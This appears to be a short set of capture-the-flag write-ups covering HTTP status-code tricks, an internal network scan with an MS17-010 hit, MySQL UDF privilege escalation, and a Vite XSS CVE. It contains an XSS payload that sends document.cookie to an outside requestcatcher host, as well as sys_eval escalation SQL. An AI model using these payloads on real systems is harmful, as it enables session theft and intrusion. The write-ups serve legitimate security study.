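HTTP Stamp Collection
12 status codes. Request any nonexistent path: 404; send an invalid Host: 400; normal request: 200; custom method: 405; request URI too long: 414; Range: bytes=10-11111111 gives 206 (Date, Cache-Control, ETag, Expires, Content-Location and Vary); Range: bytes=111110-11111111, the requested range cannot be satisfied: 416; Expect: 100-continue returns 100; Content-Length: 1234567890987 is too long and returns 413; HTTP version not supported: 505; If-Match: "12345" returns 412; IF-None-MATCH: "64dbafc8-267", using the ETag that was returned; no status code: GET / \r\nHost: example.com\r\n\r\n
Deeper and Darker
Just read the JS code; set a breakpoint and the answer comes out.
Meeting Room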
# import requests
# import json
# import re
# # Initialize the session
# s = requests.Session()
# session_value = "eyJ0b2tlbiI6IjMyNTpNRVVDSUdYazdZLzRzOGxISTVtaXRVN0Fub3h6YnpZU0tZRjBSUmJPYzZZaGtiOTlBaUVBN25BS2xQOGVuTWJSUEpEaW5oclZYU1dOdVpBM3BPdlZTZkUrQmUwbEhrcz0ifQ.ZTyNJQ.kI1MQJvggl1tTd9Je6vajHJbTkU"
# s.cookies['session'] = session_value
# # URL for fetching messages
# get_url = "http://202.38.93.111:10021/api/getMessages"
# response = s.post(get_url)
# if response.status_code == 200:
#     resp_json = ...
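Sign-in
Change the parameter in the request bar, and then it launches.
Cyber Tic-Tac-Toe
Capture the traffic and look at the submitted data: the x and y coordinates can be modified, and a piece the opponent has already placed can be overwritten.
Really Fucking Abstract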
First comes a scan, which turns up password.txt. Next there is an RCE; bring up fscan, then query, and two IPs are found: 172.26.21.50 (Windows) and 172.26.21.60 (the outward-facing Ubuntu web server).
172.26.21.60:22 open
172.26.21.50:80 open
172.26.21.50:445 open
172.26.21.50:139 open
172.26.21.50:135 open
172.26.21.60:7777 open
172.26.21.60:9091 open
172.26.21.60:9090 open
172.26.21.60:7070 open
[*] WebTitle: http://172.26.21.50 code:200 len:689 title:IIS7
[+] 172.26.21.50 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle: http://172.26.21.60:7070 code:200 len:22 ...
sql
UDF privilege escalation
SELECT xxxx INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
create function sys_eval returns string soname "moonudf.so";
select sys_eval("env");
Spirit2023-web
Rhythm game
armoured-notes
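CVE-2023-49293: the call
template = await vite.transformIndexHtml(url, template);
is vulnerable and can trigger XSS. First use merge to trigger prototype pollution and obtain the admin identity, then write a post and have the bot visit it, carrying the CVE payload:
url?"></script><script>window.location.href=`https://dionysus.requestcatcher.com/${btoa(document.cookie)}`</script>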
php_sucks
<?php
$allowedExtensions = ['jpg', 'jpeg', 'png'];
$errorMsg = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file']) && isset($_POST['name'])) {
    $userName = $_POST['name'];
    $uploadDir = 'uploaded/' . generateHashedDirectory($userName) . '/';
    if (!is_dir($uploadDir)) {
        mkdir($uploadDir, 0750, true);
    }
    $uploadedFile ...
fuck_Vultag
./wasm2wat ../webassembly.wasm -o webassembly.wat
./wasm2c ../webassembly.wasm -o webassembly.c
gcc -c webassembly.c -o webassembly.o
no code
The code is as follows:
from flask import Flask, request, jsonify
import re

app = Flask(__name__)

@app.route('/execute', methods=['POST'])
def execute_code():
    code = request.form.get('code', '')
    if re.match(".*[\x20-\x7E]+.*", code):
        return jsonify({"output": "jk lmao no code"}), 403
    result = ""
    try:
        result = eval(code)
    except Exception as e:
        result = str(e)
    return jsonify({"outpu ...
dionysus
I am drunk and would sleep; you may go for now
Where the heart is at peace